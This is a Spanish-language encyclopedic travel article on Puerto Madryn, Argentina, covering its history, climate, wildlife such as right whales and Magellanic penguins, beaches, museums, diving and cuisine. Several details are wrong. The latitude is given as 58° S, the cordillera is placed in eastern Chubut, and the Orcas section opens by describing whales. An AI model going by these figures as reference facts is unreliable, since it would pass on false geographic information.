Argentina » Puerto Madryn: historia, clima, turismo, playas y mas

Puerto Madryn: historia, clima, turismo, playas y mas

El puerto Madryn se ubica en la provincia de Chubut. Se trata de una población costera con un gran potencial turístico. A continuación se conocerá la importancia de esta ciudad de la provincia de Chubut.

Puerto Madryn

Generalidades de puerto Madryn

Se trata de una localidad de la provincia de Chubut, que es la cabecera del departamento de Biedma. Forma parte de la zona litoral de argentina y posee un potencial turístico que ha sido históricamente reconocido a nivel mundial por la cantidad de atractivos naturales único en la región.

De hecho en el país se le conoce como la capital del buceo. La ciudad costera de puerto Madryn juntamente con la península Valdés son la zona en la que desde donde se pueden acceder a seis reservas naturales que en conjunto han sido reconocidas como patrimonio natural de la humanidad.

Historia

Los tehuelches fueron los principales pobladores esta región, como tribu predominante en las tierras argentinas. Se trata de una comunidad aborigen de amplia distribución en el país. Los mismos se dedicaban a la caza y la recolección, aunque probablemente, en esta región la pesca pudiera formar parte de sus actividades.

Se establecían como comunidades sedentarias en distintos lugares de argentina. Llegando incluso a poblar la región peninsular de Valdés. Su comunidad estaba estructurada en un modelo de familiar en el cual la figura central, que gozaba del mayor poder en la sociedad pertenecía al patriarca o jefe de la tribu.

Existían otros grupos de indígenas, sin embargo eran de menor importancia ya que estos territorios eran dominio de los tehuelches. No obstantes tras la llegada de los españoles y otros inmigrantes que conformaban la gesta colonizadora las tribus y colonias indígenas fueron acabadas. Principalmente después de la conquista del desiertos. Ultima expedición que tuvo como objeto conquista las áridas zonas de la Patagonia. En las cuelas se establecieron tiempo después, siendo en 1865  cuando se produjo el verdadero asentamiento en el territorio costero.

Para el año 1888 la construcción del ferrocarril abre una estación en puerto Madryn, uniendo esta ciudad con la de trelew dentro de las rutas del ferrocarril central de Chubut. El desarrollo de la ciudad estuvo de la mano con la actividad ferroviaria. Sin embargo a mediado del siglo XX el ferrocarril cierra sus puertas y se da paso a la actividad aduanera a partir de la década de los setenta. (Ver artículo: Argentina)

puerto madryn

A partir de este punto el turismo se potenció como principal fuente económica y el surgimiento de nuevas fuentes industriales como una planta de aluminio que condujeron a puerto Madryn a un explosivo crecimiento demográfico que si bien consistió en un aumento rápido en el número de habitantes, el mismo no creo caos debido a la estabilidad económica de la ciudad.

Ubicación

La ciudad Puerto Madryn se ubica en el golfo Nuevo en la región litoral de la república Argentina. Su situación geográfica hace que este formando parte de la región patagónica orientada hacia la costa. Se trata de un municipio y ciudad del departamento de Biedma en Chubut.

Las coordenadas de esta ciudad son: 58 grados 49 minutos y 46 segundos en dirección sur y 65 grados, cuatro minutos y 56 segundos en sentido oeste. Con estas coordenadas se puede llegar a la zona central de la ciudad de puerto Madryn  ahora bien es importante para conocer Puerto Madryn, ¿cómo llegar?

Esta ciudad cuenta con un sistema de transporte interno y de largas distancias que les permite el acceso a muchos visitantes y el desplazamiento a los pobladores. Se trata de un sistema de ómnibuses que componen el transporte terrestre y  cubren rutas internas en la ciudad así como existen líneas que conducen y trasladan usuario del y hacia el interior del país. (Ver artículo: Comodoro Rivadavia)

Por otro lado, al tratarse Puerto Madryn de una ciudad costera es impensable que no posea una ruta de transporte marino. En este caso cuenta con dos muelles, en los que antiguamente se dedicaban exclusivamente a la actividad pesquera, no obstante el muelle Luis Piedrabuena fue reacondicionado y en la actualidad se permite la recepción de embarcaciones turísticas y de transporte de personas de distintas partes del mundo.

puerto madryn

Cabe destacar que en la ciudad se encuentra un aeropuerto que sirve como medio de transporte y comunicación directa con buenos aires desde donde posee viajes diurnos diariamente. Es reconocido como aeropuerto el tehuelche y operan un par de líneas aéreas de vuelos internacional.

¿Dónde queda puerto Madryn?

Considerada como el inicio o la entrada natural a la península Valdés, con la cual comparte muchos recursos naturales y turísticos, puerto Madryn se localiza en la región costera de golfo nuevo. Entre, la antes mencionada península y la punta Ninfas.

Debido a que forma parte del municipio Biedma, se encuentra en contacto con otras ciudades como puerto pirámides, Playa el doradillo, Puerto lobos, entre otros. Todas ubicadas en el departamento del noroeste de la provincia patagónica.

Provincia

Puerto Madryn es una ciudad portuaria y turística del noroeste de la provincia de Chubut. Es la principal ciudad del departamento Biedma. Es aclamada por muchos por la inmensa variedad de atractivos. El uso de los recursos naturales que ofrece la ubicación geográfica de la ciudad costera aporta un gran beneficio para la economía del puerto. (Ver articulo: Provincias de Argentina)

puerto madryn

De hecho desde década atrás esta actividad fue promovida como la base de la economía de la ciudad, logrando de este modo trasformar a puerto Madryn de una ciudad potencialmente turista que se ubica ahora en las rutas turísticas más visitadas del país.

Barrios

El crecimiento urbano al cual se vio expuesta la ciudad de Puerto Madryn trajo consigo la formación de una gran numero de barrios y localidades con el fin de albergar cómodamente al número constantemente creciente de habitantes que migraron a la ciudad en pos de un mejor estilo de vida.

Por otro lado el número de barrios creados y urbanizados en puerto Madryn son parte también de la ruta turística de la misma ciudad lo que implica que estos lugares contribuyen al mantenimiento de la economía de la región. Esto se debe a la presencia de los conjuntos residenciales, edificios, rutas hoteleras y restaurantes que se encuentran en los distintos barrios que componen la ciudad.

puerto madryn

Con un total de 32 barrios, se trata de un aglomerado de localidades que permiten la distribución uniforme de la población. Entre estos barrios se encuentran: América, Patagonia, El Porvenir, Don Bosco, Perito Moreno, Las Bardas, Manuel Del Villar, entre otros. Entre estos no se distingue un orden especifico. Pero cabe aclarar que estos constituyen solo unos pocos de los treinta y dos barrios oficiales, quizás existan en proceso de formación, nuevas localidades con visión de un futuro urbanizado. (Ver artículo: Bahía Blanca)

Habitantes

El crecimiento urbano que produjo el aumento en las fuentes de empleo con el descubrimiento del turismo como potencial sustento económico de la localidad ha hecho que el número de habitantes de la ciudad de Puerto Madryn se incrementara con una tasa de crecimiento demográfico constante.

Desde la década de los ochenta, en la que se empezó la explotación de los recursos turísticos de la región, la población contaba con poco más de veinte mil habitantes y se caracterizaba por ser una pequeña ciudad formada por un conjunto de localidades aglomeradas. Sin embargo, la creciente oferta de trabajo en la zona se convirtió en las oportunidad que pobladores de otras regiones buscaban y por lo tanto la migración hacia puerto Madryn provocó un aumento numeroso de habitantes.

De manera que se llevaron a cabo censos en 1991, 2001, 2010 y finalmente en 2017 arrojando un crecimiento altamente significativo principalmente en los últimos dos censos. Para los años 2017 en puerto Madryn se residenciaban 104026 habitantes madrynenses.

La migración de personas y el crecimiento demográfico de puerto Madryn lograron que la ciudad se desarrollara en cuanto a niveles urbanísticos. De esta manera la ciudad exigía, por la presencia de mayor número de personas, edificios, viviendas, sitios recreativos que dieran un estilo de vida cómodo a los habitantes en crecimiento de la ciudad. De este modo se ha alcanzado el nivel de desarrollo urbano con el que se cuenta. (ver articulo: Buenos Aires)

Relieve

puerto madryn

La geografía de Puerto Madryn se describe como un territorio que responde a las características de la región en la que se ubica la ciudad. Esta pertenece a la provincia de Chubut que posee características geográficas de la Patagonia como un relieve elevado y plano.

Por otro lado se trata de una ciudad costera lo cual implica que debe tener zonas que se encuentren al nivel del mar. En este sentido el relieve se manifiesta con la presencia de mesetas extensas que al llegar a los límites del continente forman acantilados y playas que sirven como lugares de atractivo turístico.

La formación del relieve de esta ciudad se caracteriza además encontrarse en un golfo rodeado de formaciones rocosas como la península Valdés y punta Ninfas que son prolongaciones de la placa continental en dirección del mar. Ambas formaciones dan lugar al Golfo Nuevo en cuya orilla se localiza Puerto Madryn.

Finalmente el relieve de la ciudad Puerto Madryn se encuentran descrito como parte de una formación que se eleva por encima del nivel del mar, y en la altura es plana, lo  que hace referencia a un sistema de mesetas que al encontrarse con la zona costera puede tener una inclinación pronunciada que dé lugar a diversas playas o bien puede continuar con la forma elevada del relieve hasta finalizar en acantilados que den frente al mar.

Clima

puerto madryn

Las condiciones climáticas de Puerto Madryn vienen dadas según la situación geografía de la ciudad. Como se trata de una ciudad costera el clima se caracteriza por ser típica de las regiones áridas con temperaturas que se regulan con la presencia de la brisa oceánica u la humedad proveniente del mar.

El relieve patagónico hace que las temperaturas no sean elevadas en todo el año. Entre estaciones se pueden apreciar cambios en cuanto a temperatura y humedad atmosférica. En este sentido, el lugar posee una temperatura media anual de 13 grados Celsius, no obstante en verano las condiciones pueden volverse muy cálidas habiendo reportes de temperaturas que han alcanzado hasta los 43 grados.

Por otro lado se han tenido temperaturas que han descendido en la estación más fría hasta once grados bajo cero. Hay que tomar en cuenta que los cambios en cuanto a los factores climáticos se van desarrollando de manera progresiva, de manera que los cambios en cuanto temperatura y humedad van siendo graduales y los datos de temperaturas extremas reportados suelen ser días escasos que se reportan aislados en los meses de las estaciones más frías o calientes. (Ver artículo: Península Valdés)

Otro aspecto importante en cuanto al clima es el nivel o la cantidad de precipitaciones que se desarrollan puerto Madryn. Como parte de la árida Patagonia el clima general de la provincia de Chubut se muestra particularmente seco, si bien la cercanía del mar hace que puerto Madryn posea una humedad atmosférica moderada las precipitaciones siguen siendo bajas en la mayor parte del año.

puerto madryn

Sin embargo, existen unos meses en los cuales las condiciones como la presión atmosféricas hacen que se propicien un mayor nivel en cuanto a la cantidad de lluvias que se desarrollan. Para el mes de octubre de cada año se reportan la mayor cantidad de precipitaciones. Esto no implica que no puedan presentarse lluvias ocasionales en el resto del año. Sino que en este mes se tienen los mayores datos en cuento a nivel pluvial se refiere en la ciudad costera.

Verano

El verano es una de las estaciones preferidas para estar en puerto Madryn. Se trata de una zona del país con un clima cálido que en verano es muy buscado por los turistas para el disfrute de las distintas atracciones turísticas como las playas, principalmente. (ver artículo: Parque nacional Los Alerces)

En esta estación se presentan las temperaturas más elevadas del año en la ciudad y la variabilidad de temperaturas entre días y noches  puede llegar a tener un amplio rango, siendo en los días muy caliente la zona costera y en la noche muy frío. Aun así, estas condiciones son las ideales para aprovechar los días de verano en la ciudad costera.

Inundaciones

Durante la estación estival es posible que se reporten en muchas ocasiones fuertes precipitaciones, sin embargo no es frecuente que estas lleguen a un elevado nivel fluvial. Históricamente la ciudad ha ido creciendo de manera constante y progresiva. Esto ha condicionada el crecimiento urbano a un ritmo, ligeramente acelerado y que ha avanzado con muy poco organización urbanística.puerto madryn

Esto último es, quizás el problema más importante con el que cuenta actualmente la población de Puerto Madryn, ya que en tiempos pasados, las lluvias que formaban pequeñas cuencas estacionales podían fluir con facilidad en el terreno libre pero debido al crecimiento de la población, las posibles vertientes pluviales han sido congestionadas por elementos urbanísticos.

En este sentido se explica porque han ocurrido en los años más recientes inundaciones en Puerto Madryn. Estos eventos han sido principalmente en el mes de abril de cada año, en el cual se ha reportado los mayores niveles pluviales.

En el año 2013 se deporto uno de los primero eventos, mas importes, en el cual una lluvia torrencial azoto la ciudad provocando la evacuación de al menos 15 personas. La lluvia que fue iniciada en una noche del mes de abril de ese año inundo las calles dejando muchos daños materiales. Los barrios principalmente afectados en este entonces fueron: Presidente Perón, San Miguel, y Pujol. Afortunadamente los hechos no arrojaron daños humanos.

Las fuertes lluvias y el viento que azotan a una ciudad cuando ocurren este tipo de eventos tienden a provocar la acumulación del agua en diversas zonas, sumado a esto la mala planificación urbana hace que el agua caída no encuentra una caída natural y busque un sentido en el cual emplazar su caudal, en este caso, se desplaza la masa de agua sin orientación fija llevando por el medio objetos que encuentra en los barrios y calles.

En este caso también se producen la inundación de casa y edificios pequeños. Esto ha sucedido al menos en un par de ocasiones en puerto Madryn, por lo que requiere un plan de contingencia para aplicar en esta situación y una planificación urbana que permite desarrollar una vía de desagüe para el contenido de las lluvias estacionales.

Invierno

puerto madryn

Por otro lado el invierno es la estación más fría, en esta las temperaturas descienden, sin embargo estas condiciones son propicias para que muchas especias animales se refugien en la costa de esta ciudad. Esto último aporta un gran beneficio para la economía local basada principalmente en la promoción de os bienes naturales propios como fuertes atractivos turísticos.

Esto significa que no solo el verano es la temporada en la que las turísticas buscan desplazarse hacia esta zona. En invierno, la movilización de visitantes es igual que en la época estival. A pesar que de que las condiciones de temperatura sean distintas a las que se obtienen en verano, ya que en invierno se han podido reportar temperaturas, que en las noches pueden llegar a estar por debajo de cero.

La variabilidad del calor entre día y noche responde a un rango de temperaturas un poco más estrecho que en verano. Sin embargo, dicho rango se mantiene amplio, durante el día las temperas medias pueden llegar hasta de 24 grados; mientras que en la noche en promedio se encuentran 2 grados centígrados de temperatura.

Estas temperaturas frías, durante el día son muy bien aprovechadas por los turistas para conocer los lugares más  populares de la región, como el avistamiento de ballenas. Y si el problema es la nubosidad o la falta de luz solar y la amenaza de lluvia, las opciones no se acaban las opciones pues se pueden visitar otros lugares en tierra o conocer la gastronomía rica que ofrece puerto Madryn.

puerto madryn

Las condiciones de temperatura siempre están siendo monitoreadas por los sistemas regionales de meteorología. Estos se encargan de reportar los pronósticos que se tienen con respecto a las condiciones climáticas. Por ejemplo en Puerto Madryn nieve  es uno de los fenómenos más esperados por su fascinante modo de cubrir la zona de una hermosa capa blanca.

La última nevada reportada en puerto Madryn se produjo en el año 2017 en el mes de julio. Los meteorólogos habían predicho la precipitación de este tipo en el acceso sur de la ciudad. Se trató de un evento de un día, en el cual las temperaturas llegaron a ser de cero grados centígrados. Este evento afecto el tránsito de la ruta nacional número 3.

En cuestión de horas la nieve ya dejaría de caer sin embargo, en este día las precipitaciones seguirían siendo reportadas así como la nubosidad de la zona. En el año 2013 también se reportó una nevada que tuvo mayores alcances que la última. La cantidad de nieve fue mayo en el año 2013. Esto, no obstante permitió que los lugareños disfrutaran de un día con el clima de los páramos.

puerto madryn

Fauna y flora

Un par de características que atraes a la población de puerto Madryn y a los turistas es la fauna y flora únicas de la región. Junto con la península Valdés la costa de puerto Madryn es el centro de reuniones de una vasta variedad de fauna marina que es muy representativa de este lugar y por la cual se ha llegado a declarar esta zona como patrimonio natural de la humanidad y por lo tanto es un territorio que amerita protección del estado.

En cuanto a la flora está condicionada por las características del relieve y esto hace que el crecimiento de las especies vegetales en la tierra se vea influenciado por el tipo de nutrientes del suelo patagónico. Además el crecimiento vegetal debe adaptase a la escasa húmeda y la poco presencia de cuerpos de agua.

La provincia de Chubut se caracteriza de manera general por la presencia de especies de pastos y arbustos típicos de ambientes semi áridos. La influencia de la cordillera de la provincia se evidencia en la región este de Chubut, donde se pueden observar la presencia de vegetación boscosa.

puerto madryn

Por el contrario en la región noroeste de la provincia, donde se sitúa el departamento de Biedma, y por tanto la ciudad puerto Madryn; se encuentra principalmente plantas de tipo xerófila y resistentes a fuertes temporadas de calor seco.

Distintas especies de plantas pequeñas se pueden encontrar entre ellas, por ejemplo: la jarilla, molle, botón de oro, quilembay, barba de chivo, mata brasilera, piquillín. Cada una de estas plantas se caracteriza por poseer hojas pequeñas de textura que impide la transpiración excesiva y por lo tanto la pérdida de la valiosa agua  que puedan absorber.

A medida que se avanza en sentido hacia la costa, las planta se vuelven más escasas y predominan las planta herbáceas y gramíneas que se adaptan muy bien a la acción del viento costero y de las temperaturas de la zona. Además que gracias a su estructura pueden absorber los nutrientes y el agua del suelo y evitar que se desperdicie, almacenándolo en su interior.

Es posible encontrar aves de extensa vegetación pero esto es en escaso lugares, y principalmente se encuentran en el área más cercana a la región costera donde la humedad atraída por la brisa del océano se hace presente en mayor medida. Esto permite un mayor crecimiento de plantas así como mayor variedad en el bioma.

Por otra parte la flora marina también es ampliamente rica y diversa. Además representa el sustento de la vida de muchos otros organismos. En este sentido, la fauna de la región, se caracteriza principalmente por ser más vistosa y llamativa en el mar. Es decir la fauna marina es mucho más atractiva y variada. En todo caso, es por la fauna marina, especialmente, por lo que la ciudad de puerto Madryn, así con la península Valdés son reconocidos a nivel prácticamente mundial.

puerto madryn

En esta región se resguardan animales como una gran variedad de aves que en algunas estaciones especificas del año viajan a la costa de este puerto para anidar. Del mismo ocurre con algunas especies de mamíferos como cetáceos y otros géneros a los que pertenecen los lobos marinos, ballenas y delfines que son frecuentes en ciertas épocas del año en las costas y las aguas del golfo nuevo en la cual se encuentra esta ciudad.

A pesar de que la fauna marina y costera es mucho más atractiva turísticamente que la terrestre, esto no implica que se pueda divisar de manera ocasional algunos guanacos, liebres y ñandúes, especies típicos de la región patagónica.

Ballenas

Uno de los animales más fascinantes que se pueden avistar en la zona marina de puerto Madryn son las ballenas. Se trata de un gran número de ballenas francas que suelen visitar las aguas cercanas al golfo nuevo en cierta estación del año con fines aún en estudio. Se cree que como se trata de agua con abundancia de minerales y nutrientes, el alimente de estas ballenas es abundantes para la época en la cual esta migran hacia acá.

Por otro lado, se maneja la idea de que al tratar de aguas calmadas es un lugar ideal para la cría y el apareamiento. Aunque estas teorías aun están siendo investigadas. A pesar de ser organismos tan grandes son difíciles de estudiar debido a lo difícil que puede resultar seguir de manera continua el monitoreo de cada grupo de ballenas.

puerto madryn

Esta especie de cetáceos se encuentra constantemente amenazada. Actualmente los cambios en los factores medioambientales son el principal riesgo que corre este grupo de organismos.

Orcas

Desde la mitad del mes de febrero de cada año hasta finales del mes de abril existe la posibilidad de ver grupos de ballenas visitar la costa argentina. Es por esto que frecuentemente  en puerto Madryn pueden verse estos mamíferos.

Las orcas se acercan a estas costas como parte de su ciclo de vida. En busca de alimentos que en esta época del año suelen ser abundantes por la presencia de colonias de lobos marinos.se trata de un fenómeno natural que los turistas aprovechan para conocer de cerca a estos impresionantes animales.

Las orcas son mamífero marino de la familia de los delfines. Se trata de organismos de gran tamaño que se desplazan generalmente en grupos y se alimentan de peces y otros mamíferos marinos o aves. Su cuerpo hidrodinámico les permite un desplazamiento veloz en el agua con lo cual la caza es una actividad que pueden desarrollar perfectamente de manera individual.

puerto madryn

Sin embargo se trata de una especie social que, al igual que una manada de lobos, cazan en grupos empleando estrategias que permiten seleccionar presas más sencillas y con las cuales pueden acabar fácilmente.

Su distribución en el mundo es casi totalmente en cualquier océano, lo cual deja en claro por qué la presencia de estas en el mar argentino. La visita a este lugar del hemisferio sur se debe, del mismo modo que las ballenas francas, a que en estas aguas tranquilas se pueden tener a las crías sin peligros, además aquí, les pueden mostrar las nuevas técnicas de caza gracias a la disponibilidad de alimentos.

Pingüinos

Uno de los animales más representativos de la región son los pingüinos magallánicos, típicos de la Patagonia. Estas aves representan un género de aves marinas que vienen a esta zona con el objeto de aprovechar las distintas especies de peces como sardinas, crustáceos y otras especies de la fauna acuática.

Muchas poblaciones de pingüinos han sido mermadas por la acción del hombre que ha tenido influencia en la reducción de los alimentos disponibles principalmente. En estas circunstancias los pingüinos han tenido la necesidad de acudir a otra costa para cumplir con su jornada alimenticia.

En este orden de ideas se explica que hace años, estas aves nadadoras hayan encontrado en las costas de puerto Madryn y la península Valdés un refugio que además de contar con una provisión constante de alimentos proporciona un lugar propicio para el anidamiento y la consecución de parejas.

puerto madryn

Los pingüinos en las costas de puerto Madryn no solo representan una de las especies por las cuales este lugar ha sido considerado un territorio que debe ser protegido por los institutos no solo de la provincia. De hecho, se ha establecido un decreto a nivel mundial a través de la Unesco en el cual se delimitan las estas costas como parte de una reserva natural que debe ser cuidad de por tratar se de uno de los pocos lugares en los que se resguardan estas especies de pingüinos y otros animales en peligro.

Delfines

La fauna marina es sin duda una de las más llamativas por la cantidad de especies, no solo de peces sino también de mamíferos marinos que se acercan en busca  de la abundancia de alimentos. Entre los mamíferos marinos el grupo que más resalta es el de los cetáceos de gran tamaño, y el grupo de lobos marino, de hecho, muchas playas son el lugar recurrente de la visita de poblaciones de lobos marinos que las ocupan con el fin de tener sus crías aquí hasta que sea seguro que vayan al agua.

Por otro lado, un buen grupo que es frecuente de encontrar en esta costa es el de delfines que es muy llamativo para los turistas, quienes además de buscar ver a las ballenas y orcas se acercan con la intensión de poder ver a los delfines en sus constantes juegos grupales.

Atraídos por la inundación de peces en ciertas épocas del año, es frecuente encontrarlos con mayor facilidad. No obstante, en esta época también es temporada en la que los máximos depredadores de la zona son atraídos por la variedad de presas disponibles.

puerto madryn

Se cumple, de esta manera, con una cadena de depredación en la que los defines y lobos marinos son atraídos a la costa de puerto Madryn por su alimento sin contar con que pueden ser la presa de orcas. En este sentido, se han reportado muchos cuerpos de delfines varados a orillas de las playas de puerto Madryn.

La justificación que se atribuye a tal hallazgo es que los delfines en busca de un escape de sus depredadores se acercan peligrosamente a la orilla y al descender la marea quedan varados asegurándose una desafortunada muerte. El 18 de marzo del año 2018 fue el último avistamiento de cuerpo de delfines a orillas de las playas de esta ciudad.

Se contaron más de cuarenta delfines de los cuales apenas 19 pudieron ser devueltos al agua. Se trata de un método de escape poco fructífero, pero finalmente una estrategia natural de estos animales, ante la cual las personas no pueden intervenir, desafortunadamente.

De cualquier manera, estos animales representan un grupo importante de organismos de la fauna autóctona y como tal se deben llevar a cabo estrategias que aseguren su preservación.

Ecocentro

Es un lugar levantada en frente del golfo. En la ciudad de puerto Madryn se inauguró en el año 2000 este centro, que posee funciones principalmente culturales, con el fin de integrar el estudio de las ciencias, el arte y la educación en pro de una mejor visión del mar en el sentido conservacionista más puro.

Se trata de un espacio que cuenta con un área de exposición en la cual se exhiben con distintos tema e instrumentos piezas naturales y artísticas que buscan crear conciencia de la relación que el ser humano ha tenido con la naturaleza, en especial con el mar. Consiste además en un programa que pretende crear una armonía entre los humanos y la vida marina, mediante la exposición de los distintos recursos que posee.

puerto madryn

Las exhibiciones que se encuentran disponible en el eco centro, entre otros, son:

  • Un esqueleto en una viga roja de una ballena franca.
  • Una exhibición de una réplica de un antiguo pozo que era alimentado por la marea, en el interior de este se encuentran restos de animales invertebrados que solo pueden divisarse en la profundidades que mar y que fueron atraídos a este por las mareas crecientes.
  • La exhibición de las distintas especias que pueden habitar las profundidades del mar.
  • Una exhibición completa de la ballena franca austral que muestra cómo se mueve y se relaciona con los miembros de su grupo.

Turismo

Como bien se ha hecho referencia el turismo en la ciudad de puerto Madryn es el lugar en el cual se desarrolla el turismo cono actividad económica principal. Mediante la promoción de los recursos que posee la ciudad se logra establecer las distintas actividades que los visitantes buscan al llegar a este lugar.

Las estaciones del año no son un impedimento para realizar un viaje de conocimiento a la región costera ya que en verano se puede aprovechar el sol, y las ventajas del clima cálido para tomar el sol y disfrutar de zonas balnearias como las distintas playas que posee la ciudad. Por el contrario en otras estaciones, mas frías se pueden llevar a cabo otras actividades. De hecho, una de las actividades más emblemáticas de la región es el avistamiento de ballenas.

Este tipo de actividad se lleva a cabo durante una época del año más o menos templada, cuando la temperatura va descendiendo. Por otro lado en tierra firme hay una variedad de propuestas que desarrollar en cuanto al turismo. De hecho el turismo gastronómico es uno de los principales de la zona. Por lo que se promocionan mucho los distintos restaurantes que se pueden encontrar en las zonas.

puerto madryn

De manera general,  puerto Madryn es una zona en la que los atractivos turísticos resaltan, de hecho se puede apreciar desde carretera lo majestuoso que puede llegar a ser la ciudad. Es por esto que esta actividad es la principal fuente de ingresos que posee el área. De hecho el turismo no solo sustenta esta ciudad, otras localidades como la península Valdés dependen del turismo y los recaudos que esto deja.

Avistaje y temporada de ballenas

Una de las actividades más comúnmente buscada por las visitas de los turistas a puerto Madryn es el avistamiento de las ballenas. Aunque se trata de una actividad que suele tener como punto de partida la península Valdés, involucra también la ciudad de puerto Madryn.

El avistaje de ballenas francas se puede llevar a cabo desde la costa de puerto Madryn, la península Valdés y el doradillo. Además existen distintas maneras de llevar a cabo este avistaje. El avistaje costero es uno de los primeros métodos en los cuales se puede recurrir para poder ver la ballena.

Esto puede llevarse a cabo desde las playas de puerto Madryn, en el doradillo y desde las avenidas principales de las ciudades costeras de la zona. Por otro lado, desde puerto pirámides existen embarcaciones que pueden desarrollar viajes que para hacer el avistamiento de las ballenas de manera más cercana en el agua.

Muchos turistas buscan experimentar este tipo de vivencias que les permite estar a pocos metros de los grandes mamíferos. Existen también un tipo de embarcaciones especiales que permiten un tipo de avistamientos distintos. En general los avistamientos se hacen desde la cubierta de las embarcaciones pero este tipo de botes especiales denominados Yellow Submarine poseen una ventana en su interior que permite divisar a los grandes mamíferos aun desde el fondo del mar.

puerto madryn

Playas

Como parte de los lugares más visitados de las zonas costera, las playas de puerto Madryn son sin duda uno de los destinos favoritos de los turistas, especialmente en verano. En este periodo de tiempo que va desde noviembre hasta enero, los días se vuelven más calurosos lo cual hace que la temperatura del agua haga una invitación para refrescarse.

Una de las playas más importantes en la región es la llamada playa el doradillo. Consiste en la más frecuentada por los turistas por la calidez de sus aguas y la posibilidad de ver ballenas en ciertas estaciones del año. Además es un importante lugar para compartir en familia junto con la naturaleza.

Mareas

En la costa de puerto Madryn las actividades turísticas son las de mayor importancia, y como se trata de una zona costera el turismo depende principalmente de las condiciones del mar, por esta razón muchos sistemas de vigilancia se mantienen en constante monitoreo de las mareas en las playas de esta ciudad.

Al tratarse de una golfo, se puede suponer que el crecimiento de las mareas quizás no tenga un gran impacto en las playas, sin embargo el crecimiento del mar si se hace notar en esta región por lo cual se deben tener en cuenta al momento de salir de pesca o ejecutar cualquier otra actividad náutica.

puerto madryn

Es importante conocer que las mareas en puerto Madryn alcanzan su punto más alto en el trascurso de la mañana, mientras que para las horas de la tarde la marea desciende considerablemente. Este comportamiento puede variar así como la altura que puede alcanzar las mareas. Sin embargo, se tiene conocimiento de que las playas de esta ciudad se comportan de manera tranquila.

Museos

Como parte de los recursos turísticos, la ciudad cuenta con una amplia cantidad de actividades alternativa en tierra que complementa un completo recorrido turístico de conocimiento de la zona costera. Se trata de una red de museos y centros culturales que cuentan la historia cultura de la ciudad con detalles didácticos que permiten a los turistas empaparse en la historia de puerto Madryn.

Entre los museos y sitios de interés que posee esta localidad se encuentra:

  • El museo provincial de ciencias naturales y oceanográfico: como su nombre lo indica se trata de una museo que se dedica a exponer el lado científico que posee la naturaleza y los conocimientos que se tienen de los recursos naturales. En especial se exhibe una muestra de los distintos especímenes que se pueden encontrar en el océano y las condiciones que este entorno puede presentar.
  • Museo municipal de arte: posee una exposición permanente de arte contemporáneo. Fue creado gracia a la acción de la comuna hace años, gracias a la cual posee grandes obras que fueron donadas pava su exhibición.
  • Centro de estudios históricos: cabe destacar que se trata de un centro en el que se expone parte de la historia de la provincia. En este recinto se puede conocer cómo se conformó la ciudad y cuáles son las bases históricas que moldearon a puerto Madryn.
  • Museo de rocas minerales y gemas: es uno de los más llamativos museos, pues posee una rara exhibición de forma permanente. Como su nombre lo indica, se trata de un lugar en el cual se exhiben muestras de piedras de origen mineral, en su mayoría extraídas en la provincia de Chubut. Y otras traídas de otros lugares, pero con la explicación de su composición y valor.

Buceo

puerto madryn

Dentro de las actividades turísticas más aclamadas por los visitantes el buceo es una de las principales en la ciudad puerto Madryn. Esto se debe a que el buceo en las aguas de esta región permite convivir de cerca con un gran número de especies marinas muy raras de ver en otros lugares del mundo. Por lo tanto es considerada esta ciudad como la capital del buceo en Argentina.

El buceo, en especial con lobos marino se puede llevar a cabo en cualquier época del año, sin embargo, durante el invierno los lobos marinos se encuentra aun a una edad temprana lo que puede hacer que se comporten de manera juguetona con los buzos y nadadores.

El buceo es una actividad muy concurrida por lo cual los turistas cuentan con 45 minutos para desarrollar un recorrido por el lecho marino, no solo conviviendo y conociendo las distintas especies marinas, sino también explorando lo profundo del mar, visitando antiguos barcos hundidos y posiblemente jugando con algún lobo marino que se disponga a interactuar.

Es una actividad pava mayores de ocho años, y cuentan con la ayuda de un personal entrenado. Sin embargo, si el turista no cuenta con experiencia y valor para asumir estos vetos siempre puede realizar snorkeling. Se trata de una actividad en la cual se emplea el uso de un snorkel pava divisar la vida marina, pero estando cerca de la superficie. Este tipo de actividades se recomienda más pava el público menor.

Pesca

Las aguas ricas en vida del mar argentino son el lugar ideal para llevar a cabo, la pesca. Bien sea que se emplee esta actividad como una estrategia económica, como una actividad deportiva o netamente como complemento de los viajes turísticos. La pesca es una opción muy divertida pava llevar a cabo en esta ciudad.

puerto madryn

En todo caso las aguas de la costa madrynense poseen una gran variedad de peces que puede ser el objeto de los pescadores. Las especies más comunes que son atrapadas por los pescadores son: cazones, besugos y el falso salmón de mar. La pesca deportiva se puede desarrollar durante la época estiva, sin embargo esto representa un gran reto.

Se debe conocer desde la ubicación de los peces hasta la cornada más efectiva pava atrapa los peces de mayor valor. Sin embargo dada la abundancia de las aguas de puerto Madryn es uno de los lugares favoritos de los pescadores.

El doradillo

El doradillo es una playa que queda en el límite de puerto Madryn y se trata de uno de los lugares más protegidos de la provincia. Es también uno de los más atractivos por la posibilidad que ofrece a los turistas de divisar desde la orilla a las ballenas francas. De hecho es considerado el mejor lugar para el avistamiento de ballenas y por esto no solo tiene importancia desde el punto de vista turístico sino también como foco ecológico.

Este ha sido el motivo por el cual este lugar ha sido considerado por la municipalidad como un recursos natural que se debe resguardar.

Punta tombo

Uno de los paseos clásicos de los visitantes en puerto Madryn. Se trata de una zona que es muy frecuentada por los turistas que buscan la oportunidad de ver de cerca comunidades de pingüinos de Magallanes que frecuentemente se encuentran en esta región.

Esto se debe a que es la región que esta aves eligen para anidar y cuidar a sus crías. Una vez descubierto se convirtió en un área predilecta pava la visita de turistas y científicos que busca aprender del comportamiento de estos animales. (ver articulo: Partido de La Matanza)

Gastronomía

puerto madryn

Puerto Madryn es una ciudad costera que ofrece grandes atractivos turísticos, entre ellos unos grandes números de platos exóticos. La gastronomía de la ciudad es muy particular por la influencia directa de los productos del mar. Además no se puede dejar de lado el hecho de que pertenece a la zona patagónica y por lo tanto la influencia de la gastronomía típica de argentina se entremezcla fuertemente con el gustoso sabor de los productos marinos.

Al hablar de platos típicos, se debe nombrar indiscutiblemente a los mariscos y pescados como los protagonistas principales de la cocina madrynense. Los moluscos como el pulpo, y los langostinos fritos representan un plato que acompañados de una ensalada típica de la región pueden ser los favoritos de los visitantes. En la mayoría de los restaurantes los productos del mar tanto fritos como a la parrilla representan una excelente selección.

Bien sea como parte del plato principal o como picada o entrada, los mariscos y el pescado son muy comunes a la hora de elegir la comida. Por otro lado, los visitantes no pierden el gusto por la carne, y en puerto Madryn existen platos cuyas presentaciones pueden sorprender la vista y el paladar.

